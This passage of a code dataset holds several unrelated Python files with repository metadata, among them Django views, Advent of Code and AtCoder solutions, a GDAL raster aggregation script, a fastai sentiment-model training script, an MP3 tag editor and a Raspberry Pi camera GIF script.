sys.exit(1)\n","repo_name":"rangercyh/utils","sub_path":"pack/xxtea.py","file_name":"xxtea.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18890208822","text":"import json\nimport time\n\nfrom asgiref.sync import async_to_sync\nfrom channels.layers import get_channel_layer\nfrom django.conf import settings\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom sentry_sdk import capture_exception\n\n\ndef send_channels_group(\n group_name: str,\n call_type: str,\n content: str,\n action: str,\n retry=settings.WS_MESSAGE_RETRIES,\n):\n \"\"\"\n helper function that sends data to channels groups\n \"\"\"\n try:\n channel_layer = get_channel_layer()\n async_to_sync(channel_layer.group_send)(\n group_name,\n {\n \"type\": call_type,\n \"action\": action,\n \"content\": json.dumps(content, cls=DjangoJSONEncoder),\n },\n )\n except Exception as err:\n if retry > 0:\n time.sleep(settings.WEBSOCKET_RETRY_SLEEP)\n return send_channels_group(\n group_name, call_type, content, action, retry - 1\n )\n capture_exception(err)\n","repo_name":"weni-ai/chats-engine","sub_path":"chats/utils/websockets.py","file_name":"websockets.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"32107101491","text":"def main() -> str:\n N = int(input())\n\n candidates = dict()\n for _ in range(N):\n name = input()\n v = candidates.get(name) or 0\n candidates[name] = v + 1\n\n ans = None\n max_v = 0\n for k, v in candidates.items():\n if v > max_v:\n ans = k\n max_v = v\n\n return ans\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"tiqwab/atcoder","sub_path":"abc231/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70364647185","text":"\"\"\" Controlling via boot_store - there is loading all boot modules that should be controlled\"\"\"\r\n\"\"\"\r\nexcept Exception as ex:\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n raise ValueError(\"Fatal error in core\")\r\n \r\n\"\"\"\r\n\r\nfrom apd_types import BootStartBase, FutureTask\r\nimport hassapi as hass # type:ignore\r\nfrom functools import wraps\r\nimport decorators as d\r\n\r\nfrom module_register import ModuleClasses\r\nfrom helper_tools import MyHelp as h\r\nfrom helper_types import QueueType\r\nfrom asyncio import Queue\r\n\r\nfrom globals import gv\r\nimport globals as g\r\n\r\n\r\n# Do not put in decorators - it is regarding bootstart only\r\ndef boot_module(func):\r\n \"\"\"Adding to boot_store for controlling, necessary to do that in initialize\r\n\r\n Args:\r\n func ([type]): [description]\r\n\r\n Returns:\r\n [type]: [description]\r\n \"\"\"\r\n\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n # Signal that module was loaded by system\r\n module_name = h.module_name(hass)\r\n boot_modules = hass.global_vars.get(gv.BOOT_MODULES)\r\n if boot_modules is None:\r\n boot_modules: dict = {}\r\n hass.global_vars[gv.BOOT_MODULES] = boot_modules\r\n\r\n if boot_modules.get(module_name) is None:\r\n boot_modules.update({module_name: hass.args[\"module\"]})\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\ndef initialized(func):\r\n \"\"\"Adding to boot_store for controlling, necessary to do that in initialize\r\n\r\n Args:\r\n func ([type]): [description]\r\n\r\n Returns:\r\n [type]: [description]\r\n \"\"\"\r\n\r\n\r\ndef apf_module(func):\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n module_name = h.module_name(hass)\r\n\r\n apf_modules = hass.global_vars.get(\"apf_modules\")\r\n if apf_modules is None:\r\n apf_modules: dict = {}\r\n hass.global_vars[\"apf_modules\"] = apf_modules\r\n if apf_modules.get(module_name) is None:\r\n apf_modules.update({module_name: hass.args[\"module\"]})\r\n\r\n apf_modules_init = hass.global_vars.get(gv.APF_MODULES_INIT)\r\n if apf_modules_init is None:\r\n apf_modules_init: dict = {}\r\n hass.global_vars[gv.APF_MODULES_INIT] = apf_modules_init\r\n\r\n if apf_modules_init.get(module_name) is None:\r\n apf_modules_init.update({module_name: hass.args[\"module\"]})\r\n\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\ndef boot_logger(func):\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n try:\r\n log = hass.get_user_log(\"apf_logger\")\r\n except:\r\n log = None\r\n if log is not None:\r\n hass.logger = log\r\n hass.set_log_level(\"INFO\")\r\n hass.set_log_level(\"DEBUG\")\r\n hass.debug = hass.logger.debug\r\n hass.error = hass.logger.error\r\n hass.info = hass.logger.info\r\n hass.warning = hass.logger.warning\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\ndef boot_logger_off(func):\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n try:\r\n log = hass.get_user_log(\"apf_logger\")\r\n except:\r\n log = None\r\n if log is not None:\r\n hass.logger = log\r\n hass.set_log_level(\"INFO\")\r\n hass.debug = hass.logger.debug\r\n hass.error = hass.logger.error\r\n hass.info = hass.logger.info\r\n hass.warning = hass.logger.warning\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\nclass BootStart(BootStartBase):\r\n @boot_logger\r\n def initialize(self):\r\n super().initialize()\r\n self.info(\"Initialize\")\r\n self.boot_queue: QueueType = None\r\n self.apf_queue = None\r\n # in case of debug to allow only some classes\r\n self.apf_allowed = h.par(self.args, \"apf_allowed\", [])\r\n # self.warning(self.apf_allowed)\r\n d.debug_allowed = h.par(self.args, \"debug_allowed\", [])\r\n\r\n self._handler_end = None\r\n self._finished = False\r\n config = self.get_plugin_config()\r\n g.time_zone = h.par(config, \"time_zone\", \"\")\r\n self._main_loop_running = False\r\n self.go_init = True\r\n self._task_future: FutureTask = self.sync_create_task(self._main_loop())\r\n\r\n async def clear(self):\r\n self.debug(\"Clear!\")\r\n while True:\r\n if self.boot_queue is not None:\r\n try:\r\n self.boot_queue.get_nowait()\r\n except:\r\n return\r\n self.boot_queue.task_done()\r\n\r\n # ################################################################################\r\n # Maiun loop\r\n # - waiting till all defined boot_modules are done, only then can go to apf modules\r\n # - waiting to all apf modules\r\n ##############################################################################\r\n async def _main_loop(self):\r\n\r\n self._boot_sequence_finished = False\r\n self.warning(\"Start main loop\")\r\n self.module_classes: ModuleClasses = ModuleClasses(self, \"module_classes\")\r\n self.warning(\"Module classes ok\")\r\n await self.module_classes.check_reload()\r\n self._main_loop_running = True\r\n self.debug(\"-Start main loop\")\r\n while self._main_loop_running:\r\n self.debug(\"Waiting\")\r\n if await self.module_classes.all_boot_registered:\r\n break\r\n await self.sleep(5)\r\n self.module_classes.put_boot_modules()\r\n\r\n self.debug(\"Registered\")\r\n while self._main_loop_running:\r\n if self.module_classes.is_boot_finished:\r\n break\r\n self.debug(f\"Waiting for get\")\r\n module_name = await self.module_classes.boot_queue.get()\r\n self.debug(f\"Boot module_name: {module_name}, starting\")\r\n\r\n await self.run_init_boot_module(module_name)\r\n\r\n # Boot modules done, calling APF\r\n self._boot_sequence_finished = True\r\n\r\n self.debug(\"APF ini\")\r\n try:\r\n while self._main_loop_running:\r\n await self.module_classes.put_apf_modules()\r\n module_name = await self.module_classes.apf_queue.get()\r\n self.debug(f\"APF module_name: {module_name}, running init\")\r\n\r\n # Checking if it is allowed\r\n can_be_called = False\r\n if len(self.apf_allowed) == 0:\r\n can_be_called = True\r\n elif h.in_array(module_name, self.apf_allowed):\r\n can_be_called = True\r\n if can_be_called:\r\n await self.run_init_apf_module(module_name)\r\n else:\r\n self.debug(f\"Not allowed>>>: {module_name}\")\r\n self.module_classes.close_module(module_name)\r\n self.module_classes.apf_queue.task_done()\r\n except Exception as ex:\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n raise ValueError(\"Fatal error in core\")\r\n\r\n async def run_init_apf_module(self, module_name):\r\n try:\r\n await self.module_classes.run_init(module_name)\r\n except Exception as ex:\r\n self.error(f\"Could not ini: {module_name}\")\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n self.module_classes.apf_queue.task_done()\r\n\r\n async def run_init_boot_module(self, module_name):\r\n try:\r\n await self.module_classes.run_init(module_name)\r\n except Exception as ex:\r\n self.error(f\"Could not ini: {module_name}\")\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n raise ValueError(\"Fatal error in core\")\r\n await self.wait_for_finished_boot()\r\n\r\n async def wait_for_finished_boot(self):\r\n while self.init_finished is not None:\r\n self.debug(f\"Waiting for finishing: {self.init_finished}\")\r\n await self.sleep(1)\r\n self.module_classes.boot_queue.task_done()\r\n\r\n def init_done(self, source: hass.Hass):\r\n \"\"\"Called from child (boot, apf) module\"\"\"\r\n finished = h.module_name(source)\r\n if self.init_finished is None:\r\n self.error(\"Already finished\")\r\n return\r\n if self.init_finished != finished:\r\n self.error(f\"Waiting for {self.init_finished} and finished: {finished}\")\r\n self.init_finished = None\r\n\r\n def terminate(self):\r\n self.debug(\"Terminate\")\r\n self._task_future.cancel() # type:ignore\r\n self._main_loop_running = False\r\n","repo_name":"JiriKursky/AppFramework","sub_path":"code/app_framework/bootstart.py","file_name":"bootstart.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14062847802","text":"def read_rule(line):\n field, nums = line.strip().split(':')\n range_1, conj, range_2 = nums.strip().split()\n rule = {field: list(map(int, range_1.split('-'))) +\n list(map(int, range_2.split('-')))}\n return rule\n\ndef is_valid(ticket, rules):\n valid_keys = []\n for field_val in ticket:\n valid_fields = set()\n for x,y in rules.items():\n a,b,c,d = y\n if a <= field_val <=b or c <= field_val <= d:\n valid_fields.add(x)\n if valid_fields == set():\n return False\n valid_keys.append(valid_fields)\n return valid_keys\n\ndef name_fields(infile):\n data = 0\n rules = {}\n error_rate = 0\n with open(infile, 'r') as f:\n for line in f:\n if line.strip() == '':\n data += 1\n continue\n if data in [1,3]:\n if data == 1:\n field_options = [set(rules.keys()) for _ in range(len(rules.keys()))]\n data += 1\n continue\n if data == 0:\n rules.update(read_rule(line))\n elif data == 2:\n my_ticket = list(map(int, line.strip().split(',')))\n for idx, fields in enumerate(is_valid(my_ticket, rules)):\n field_options[idx].intersection_update(fields)\n elif data == 4:\n valid = is_valid(map(int, line.strip().split(',')), rules)\n if valid is not False:\n for idx, fields in enumerate(valid):\n field_options[idx].intersection_update(fields)\n return field_options, my_ticket\n\ndef unique_fields(field_options):\n field_positions = {}\n fields_found = 0\n ided_field = {}\n while fields_found < len(field_options):\n for i,j in enumerate(field_options):\n if len(j) == 1:\n field_positions[min(j)] = i\n ided_field = j\n fields_found += 1\n break\n field_options = [x.difference(ided_field) for x in field_options]\n return field_positions\n\n\n\n\n\n\n\nif __name__ == '__main__':\n infile = 'Advent16.txt'\n field_options, my_ticket = name_fields(infile)\n field_indices = unique_fields(field_options)\n depart = 1\n for x,y in field_indices.items():\n if 'departure' in x:\n depart *= my_ticket[y]\n print(depart)","repo_name":"jefallon/adventofcode2020","sub_path":"Day16b.py","file_name":"Day16b.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29269078783","text":"import logging\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.views import generic\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponse\n\nfrom ccshuffle.serialize import ResponseObject\nfrom .forms import LoginForm, RegistrationForm\nfrom .searchengine import SearchEngine\n\nlogger = logging.getLogger(__name__)\n\n\nclass IndexPageView(generic.TemplateView):\n template_name = 'index.html'\n\n def get(self, request, *args, **kwargs):\n request.session['last_url'] = request.get_full_path()\n kwargs['tags'] = SearchEngine.all_tags()\n search_for = request.GET.get('search_for', None)\n if search_for:\n search_request = SearchEngine.SearchRequest(search_phrase=request.GET.get('search_phrase', ''),\n search_for=search_for)\n search_response = SearchEngine.accept(search_request)\n search_result_offset = int(request.GET.get('start', 0))\n kwargs['search_result_count'] = len(search_response.search_result)\n kwargs['search_offset'] = search_result_offset\n kwargs['search_result'] = list(\n search_response.search_result[search_result_offset:search_result_offset + 10])\n if search_for == 'songs':\n kwargs['searched_tags'] = search_response.extracted_tags\n return super(IndexPageView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n\n\nclass AboutPageView(generic.TemplateView):\n \"\"\"\n This class represents the view of the about page. This page contains information about the creative commons\n shuffle service.\n \"\"\"\n template_name = 'about.html'\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n\n\nclass SignInPageView(generic.FormView):\n form_class = LoginForm\n success_url = reverse_lazy('home')\n template_name = 'signin.html'\n\n def form_valid(self, form):\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n logger.info(username + \" logged in.\")\n if user is not None and user.is_active:\n login(self.request, user)\n return super(SignInPageView, self).form_valid(form)\n else:\n return self.form_invalid(form)\n\n def form_invalid(self, form):\n form.cleaned_data['next'] = self.success_url\n return super(SignInPageView, self).form_invalid(form)\n\n def post(self, request, *args, **kwargs):\n self.success_url = request.POST.get('next', request.GET.get('next', reverse_lazy('home')))\n if self.success_url is None or len(self.success_url) == 0:\n self.success_url = reverse_lazy('home')\n return super(SignInPageView, self).post(request, *args, **kwargs)\n\n\nclass SignOutPageView(generic.RedirectView):\n \"\"\" The global sign out link. \"\"\"\n default_redirect_url = reverse_lazy('home')\n url = default_redirect_url\n\n def get(self, request, *args, **kwargs):\n self.url = request.POST.get('next', request.GET.get('next', reverse_lazy('home')))\n logger.debug(\"Current Url: %s \" % self.url)\n logger.info(\"Logout. (Redirected to %s)\" % self.url)\n logout(request)\n return super(SignOutPageView, self).get(request, *args, **kwargs)\n\n\nclass RegisterPageView(generic.CreateView):\n form_class = RegistrationForm\n model = User\n template_name = 'register.html'\n success_url = reverse_lazy('signin')\n\n def __init__(self):\n super(type(self), self).__init__()\n self.registration_form = None\n\n def get_form(self, form_class=None):\n if self.registration_form is None:\n self.registration_form = super(type(self), self).get_form(form_class)\n return self.registration_form\n\n def clear_form(self):\n del self.registration_form\n\n def post(self, request, *args, **kwargs):\n response = super(type(self), self).post(request, *args, **kwargs)\n # Success message for the registration, displayed on the 'sign in' page, where the user is redirected to.\n if self.registration_form.is_valid():\n messages.add_message(request, messages.SUCCESS,\n _('Welcome %(username)s ! Your account has been created, now you can login.' % {\n 'username': self.registration_form.cleaned_data.get('username')}))\n self.clear_form()\n return response\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n\n @classmethod\n def is_username_available(cls, request):\n print(request.method)\n if request.is_ajax() and request.method == 'GET':\n username = request.GET.get('username', None)\n if username:\n return HttpResponse(\n ResponseObject('success', 'Fails', not User.objects.filter(username=username).exists()).json(),\n content_type=\"json\")\n else:\n return HttpResponse(ResponseObject('fail', 'The username to check must be given.', None).json(),\n content_type=\"json\")\n else:\n return redirect('404')\n\n\nclass NotFoundErrorPageView(generic.TemplateView):\n \"\"\"\n This class represents an error page, which will be displayed, if the page (the user looked for) can't be found on\n the server.\n \"\"\"\n template_name = '404.html'\n\n def get(self, request, *args, **kwargs):\n logger.info(\"Get (Not found) %s\" % request.session['last_url'])\n context = self.get_context_data(**kwargs)\n return self.render_to_response(context, status=404)\n\n def get_context_data(self, **kwargs):\n context = super(type(self), self).get_context_data(**kwargs)\n context['globalLoginForm'] = LoginForm\n return context\n","repo_name":"scottaglia/ccshuffle","sub_path":"shuffle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29796437079","text":"# ### BEGIN OF HEADER INFROMATION AND LOADING OF MODULES (Not all modules are actually required for the analysis) #######################\n# IMPORT SYSTEM MODULES\nfrom __future__ import division\nfrom math import sqrt\nimport sys, string\nimport os\n#import arcgisscripting\nimport time\nimport datetime\nimport shutil\nimport math\nimport numpy as np\nimport tarfile\n#np.arrayarange = np.arange\nfrom numpy.linalg import *\nfrom osgeo import gdal\nfrom osgeo.gdalconst import *\ngdal.TermProgress = gdal.TermProgress_nocb\nfrom osgeo import osr\ngdal.TermProgress = gdal.TermProgress_nocb\nfrom osgeo import gdal_array as gdalnumeric\n\n# ######################################## END OF HEADER INFROMATION AND LOADING OF MODULES ##########################################\n\n# ##### SET TIME-COUNT AND HARD-CODED FOLDER-PATHS #####\nstarttime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"\")\nprint(\"Starting process, time:\", starttime)\n\nroot_folder = \"E:\\\\tempdata\\\\mbaumann\\\\11_Windfall-classification_20120207\\\\RS_Data\\\\\"\nLandsat_file = \"E:\\\\tempdata\\\\mbaumann\\\\11_Windfall-classification_20120207\\\\RS_Data\\\\Landsat_Disturbance-map_mosaic_subset\"\n\nPerc_Disturb = \"E:\\\\tempdata\\\\mbaumann\\\\11_Windfall-classification_20120207\\\\RS_Data\\\\Landsat_Disturbance-map_mosaic_subset_MODIS-aggregated\"\n\n# ##### START THE SORTING #####\n\n# (1) Make pre-work steps --> load into gdal, generate output file\n\n# (1-A) Load Landsat into Gdal\nLandsat_file_gdal = gdal.Open(Landsat_file, GA_ReadOnly)\ncols = Landsat_file_gdal.RasterXSize\nrows = Landsat_file_gdal.RasterYSize\n\n# Re-Convert cols and rows, so that we have the edges (which are not 8x8 pixels) gonna get cut off\ncols = 8*(math.floor(cols/8))\nrows = 8*(math.floor(rows/8))\noutDrv = gdal.GetDriverByName('ENVI')\n\n# (1-B) Create output-file --> with 8x less cols and row, because we make the average of 8x8 pixels \noutputCols = int(cols/8)\noutputRows = int(rows/8)\n\ncols = cols-1\nrows = rows-1\n\nPDist = outDrv.Create(Perc_Disturb, outputCols, outputRows, 1, GDT_Float32)\nPDist.SetProjection(Landsat_file_gdal.GetProjection())\nPDist.SetGeoTransform(Landsat_file_gdal.GetGeoTransform())\n\n# (2) Process the data\n\n# (2-A) Build the output-array and set all values to zero.\ndataOut = np.zeros((outputRows, outputCols))\t# float64 is the default\n\n# (2-B) Initialize Moving window --> MODIS-pixel is ~236m, equaling approximately 8x8 Landsat pixels\nwindowsize = 8\n# define and initialize the row for the output-file\noutput_i = 0\noutput_j = 0\n\nfor i in range(0, cols, windowsize):\n\tif i + windowsize < cols:\n\t\tnumCols = windowsize\n\telse:\n\t\tnumCols = cols - i\n\n\t# define the col for the output-file\n\toutput_j = 0\t\n\tfor j in range(0, rows, windowsize):\n\t\tif j + windowsize < rows:\n\t\t\tnumRows = windowsize\n\t\telse:\n\t\t\tnumRows = rows - j\n\t\n# (2-C) Load in the bands as specific types --> 'float32', 'int16'\n\t\tLandsat = Landsat_file_gdal.GetRasterBand(1).ReadAsArray(i, j, numCols, numRows).astype(np.int)\t\t\t\n\n# (2-D) Mask everything into 1 (disturbance) and 0 (everything else)\t--> disturbance-values are 3 and 4 in the change map\n\t\tmask = np.equal(Landsat, 3)\t\t# cgabge back to 3\n\t\tD1 = np.choose(mask, (0, 1))\n\t\tmask = np.equal(Landsat, 4)\n\t\tD2 = np.choose(mask, (0, 1))\n\t\tmask = np.less(Landsat, 3)\n\t\tdisturb = D1 + D2\n\n# (2-E) Assess how many disturbance pixel are in the window and calculate the percentage\n\t\tdistPixel = np.sum(disturb)\n\t\tdistProp = (distPixel/(windowsize * windowsize))*100\n\n# (2-F) Write the value into the dataOut-Array\n\t\tdataOut[output_j, output_i] = distProp\n\t\toutput_j = output_j + 1\n# (2-G) Make the output_j and output_i continue to increase \n\toutput_i = output_i + 1\n\n# (2-H) Write the dataOut-array into the output-file\t\nPDist.GetRasterBand(1).WriteArray(dataOut, 0, 0)\t\n\t\nprint(\"--------------------------------------------------------\")\nprint(\"\")\n\nendtime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \", starttime)\nprint(\"end: \", endtime)\nprint(\"\")","repo_name":"matthias-baumann/ScriptCollections_py","sub_path":"OLD_UnorderedScripts/baumann-etal_Windfall_C2_Create_Perc-Disturbance_MODIS-to-Landsat.py","file_name":"baumann-etal_Windfall_C2_Create_Perc-Disturbance_MODIS-to-Landsat.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32936441796","text":"from fastai.text.all import *\nimport wandb\nfrom fastai.callback.wandb import *\n\nwandb.init(project='fastainlp')\n\npath = untar_data(URLs.IMDB)\n\n# get_text_files get all the text files in a path\nfiles = get_text_files(path, folders=['train', 'test', 'unsup'])\n# Logging\nprint(\"get text files \\n\")\n\n# tokenize 1\nspacy = WordTokenizer()\n# Logging\nprint(\"load spacy \\n\")\n# tokenize 2\ntkn = Tokenizer(spacy)\n# Logging\nprint(\"load tokenizer \\n\")\n\n# first 2000 movie reviews\ntxts = L(o.open().read() for o in files[:2000])\ntoks200 = txts[:200].map(tkn)\n# Logging\nprint(\"load first 2000 movie reviews \\n\")\n\n# numericalize\nnum = Numericalize()\nnum.setup(toks200)\nnums200 = toks200.map(num)\n# Logging\nprint(\"done numericalize \\n\")\n\ndl = LMDataLoader(nums200)\nx, y = first(dl)\n# logging\nprint(\"load LMDataLoader \\n\")\n\nget_imdb = partial(get_text_files, folders=['train', 'test', 'unsup'])\ndls_lm = DataBlock(\n blocks=TextBlock.from_folder(path, is_lm=True),\n get_items=get_imdb, splitter=RandomSplitter(0.1)\n).dataloaders(path, path=path, bs=128, seq_len=80)\n\n# Logging\nprint(\"load dls_lm \\n\")\n\n# initial PLM\nlearn = language_model_learner(\n dls_lm, AWD_LSTM, drop_mult=0.3,\n # perplexity() = torch.exp(cross_entropy), classification task, accuracy = the number of times the model is right at predicting the next word\n metrics=[accuracy, Perplexity()], cbs=WandbCallback()\n).to_fp16()\n\n# first phase fine-tuned LM\nlearn.fit_one_cycle(1, 2e-2)\nlearn.save('1epoch')\nlearn.load('1epoch')\nlearn.unfreeze()\nlearn.fit_one_cycle(10, 2e-3)\nlearn.save_encoder('finetuned')\nprint(\"save encoder \\n\")\n\ndls_clas = DataBlock(\n blocks=(TextBlock.from_folder(path, vocab=dls_lm.vocab), CategoryBlock),\n get_y=parent_label,\n get_items=partial(get_text_files, folders=['train', 'test']),\n splitter=GrandparentSplitter(valid_name='test')\n).dataloaders(path, path=path, bs=128, seq_len=72)\nprint(\"load dls_clas \\n\")\n\ndls_clas.show_batch(max_n=3)\n\nlearn = text_classifier_learner(\n dls_clas, AWD_LSTM, drop_mult=0.5, metrics=accuracy, cbs=WandbCallback()).to_fp16()\n\n# load would raise an exception is an incomplete model is loaded, so we use load_encoder\nlearn = learn.load_encoder('finetuned')\n# train with discriminative learning rate and gradual unfreezing, in NLP, unfreezing a few layers at a time has better perform\nlearn.fit_one_cycle(1, 2e-2)\nlearn.freeze_to(-2) # free all except the last two parameter groups\n# higher learning rate for final layers, lower learning rate for earlier\nlearn.fit_one_cycle(1, slice(1e-2/(2.6**-4), 1e-2))\nlearn.freeze_to(-3) # unfree a bit more\n# continue training at a lower learning rate\nlearn.fit_one_cycle(1, slice(5e-3/(2.6**4), 5e-3))\nlearn.freeze_to() # unfree the whole model\nlearn.fit_one_cycle(2, slice(1e-3/(2.6**4), 1e-3))\n","repo_name":"KyraZzz/fastai-nlp","sub_path":"text_transfer_learning.py","file_name":"text_transfer_learning.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7023679871","text":"import struct\nimport argparse\nimport os\n\n# py 1.py -s \"D:\\Programming\\Python\\Python_Labs\\Lab_4\\\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--source', required=True)\nparser.add_argument('-d', '--demp', action='store_const', const=True, default=False)\nparser.add_argument('-g', '--genre')\nnamespace = parser.parse_args()\n\nnumber = 1\nfor address, dirs, files in os.walk(namespace.source):\n for music in files:\n\n if '.mp3' in music:\n musAddress = address + '\\\\' + music\n\n with open(musAddress, \"rb\") as fileRead:\n # Read last 3 byte\n fileRead.seek(-3, 2)\n zeroByte = int.from_bytes(fileRead.read(1), 'big')\n fileRead.read(1)\n genreByte = int.from_bytes(fileRead.read(1), 'big')\n fileRead.seek(0)\n dataAllFile = fileRead.read()\n\n # Write data\n with open(musAddress, \"wb\") as fileWrite:\n fileWrite.write(dataAllFile)\n\n # Set number\n if zeroByte != 0:\n fileWrite.seek(-3, 2)\n fileWrite.write(b'\\x00')\n fileWrite.write(struct.pack('B', number))\n number += 1\n\n # Set genre\n if namespace.genre != None and genreByte == 255:\n fileWrite.seek(-1, 2)\n fileWrite.write(struct.pack('B', int(namespace.genre)))\n\n # Read 128 byte tag\n fileRead.seek(-128, 2)\n dataTag = fileRead.read(128)\n\n # Decode and print tag\n unpacked = struct.unpack('3s 30s 30s 30s 4s 28s B B B', dataTag)\n\n result = ''\n for i in range(1, 4):\n result += '[' + unpacked[i].decode().replace('\\0', '') + ']'\n if i != 3:\n result += ' - '\n\n print(result)\n\n # Print demp tag\n if namespace.demp:\n for tag in unpacked:\n print(tag)\n","repo_name":"Oleja302/Python_Labs","sub_path":"Lab_4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42364060730","text":"# -*- coding: utf-8 -*-\n\n'''\nThis project requires ImageMagick, a command-line program for image manipulation. To install ImageMagick, \nrun the following commands in a terminal window:\nsudo apt-get update\nsudo apt-get install imagemagick -y\n'''\n\n#Bibliotheken importieren\nfrom picamera import PiCamera, Color\nimport time\nfrom datetime import datetime\nimport os\nimport motor\n\n\ncamera = PiCamera()\n\n#Konfiguration Kamera\n##Auflösung anpassen\ncamera.resolution = (320, 240)\n\n##horizontal spiegeln\ncamera.rotation = 180\n\n##Belichtung\n### off, auto, night, nightpreview, backlight, spotlight, sports, snow, beach, verylong, fixedfps, antishake, fireworks\ncamera.exposure_mode = 'auto'\n\n##Weißabgleich\n### off, auto, sunlight, cloudy, shade, tungsten, fluorescent, flash, horizon\ncamera.awb_mode = 'auto'\n\n#Konfiguration GIF\n#Anzahl Bilder in GIF\nnum_pic = 4\n\n#Dauer der Bilder in GIF (in Millisekunden)\nnum_delay = 15\n\n#Pfad Pics\npfad_pics = 'Pics_temp'\n\n#Pfad Gif\npfad_gif = 'Gif/'\n\n\n\n#Funktion zur Erstellung der Gif\ndef gif(pfad_pics_parameter):\n \n # eindeutigen Dateinamen erstellen\n now = datetime.now()\n dateiname = now.strftime(\"%Y-%m-%d_%H:%M:%S.gif\")\n gif_pfad_name = pfad_gif + dateiname\n \n #Backticks `` Befehl wird ausgeführt und Ergebnis im String eingesetzt\n os.system('convert -delay ' + str(num_delay) + ' -loop 0 ' + pfad_pics_parameter + '/image*.jpg ' + gif_pfad_name)\n return gif_pfad_name \n\n\n#Funktion zur Aufnahme der Bilder sowie Erstellung der Gifs\ndef camera_pic():\n try:\n #alpha: Preview halb-durchsichtig starten (0-255) alpha = 200\n camera.start_preview(fullscreen = True) \n # Text konfigurieren\n camera.annotate_text_size = 160 #6-160\n camera.annotate_background = Color('black')\n camera.annotate_foreground = Color('white')\n \n # Kamera wartet 2 Sekunden, bevor der Countdown startet\n time.sleep(2) \n \n # Countdown läuft runter 5.. 4..\n for i in range(5,2,-1):\n camera.annotate_text = \"%s\" % i\n time.sleep(.5)\n camera.annotate_text = \"\"\n \n \n # Pfad für die Bilder erstellen\n pfad_temp = pfad_pics + '/pics_session'\n os.mkdir(pfad_temp)\n \n \n # bei 3 startet die Kamera mit der Aufnahme\n for i in range(num_pic):\n camera.capture(pfad_temp + '/image{0:02d}.jpg'.format(i))\n motor.forward(0.001,25)\n time.sleep(0.2)\n \n #Preview wird beendet \n camera.stop_preview() \n \n #motor zurücksetzen\n motor.backwards(0.001,100)\n motor.setStep(0,0,0,0) \n \n # Funktion gif aufrufen, temporären Pics-session-Ordner übergeben\n pfad_gif_return = gif(pfad_temp)\n \n \n # Inhalt des Pics-session-Ordner löschen\n for root, dirs, files in os.walk(pfad_temp, topdown=False):\n for name in files:\n os.remove(os.path.join(root, name))\n for name in dirs:\n os.rmdir(os.path.join(root, name))\n # Pics-session-Ordner löschen\n os.rmdir(pfad_temp)\n \n return pfad_gif_return\n\n except KeyboardInterrupt:\n #bei Unterbrechen des Programms mittels ctrl+c wird die preview beendet \n camera.stop_preview()\n\n\n\n#Funktion camera_pic() wird ausgeführt\nif __name__ == '__main__':\n print(camera_pic())\n print('fertisch')\n\n","repo_name":"lespowl/lasmaschuen","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28904785535","text":"# implementation of card game - Memory\r\n\r\nimport simplegui\r\nimport random\r\n\r\n# helper function to initialize globals\r\ndef new_game():\r\n global WIDTH, cards, card_pos, exposed, state, click_count, n, m, 